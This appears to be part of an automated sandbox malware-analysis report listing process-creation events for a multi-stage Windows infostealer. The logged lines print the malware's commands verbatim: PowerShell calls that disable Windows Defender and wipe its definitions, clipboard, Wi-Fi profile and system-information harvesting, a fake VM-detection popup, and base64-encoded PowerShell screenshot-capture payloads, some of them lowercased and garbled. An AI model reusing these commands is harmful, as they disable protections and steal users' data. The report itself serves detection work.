                                Source: C:\Users\user\AppData\Local\Temp\main.exe - Process created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe"
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\main.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe - Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe - Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                Source: C:\Windows\System32\cmd.exe - Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe - Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\hacn.exe - Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\ProgramData\Microsoft\based.exe - Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHk
ARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\hacn.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\main.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\ProgramData\svchost.exe | Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\ProgramData\setup.exe | Process created: unknown unknown
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
                                Source: C:\ProgramData\svchost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7796"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find ":"
                                Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
                                Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
                                Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
                                Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
                                Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahk
argbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8a
bqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahk
argbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbza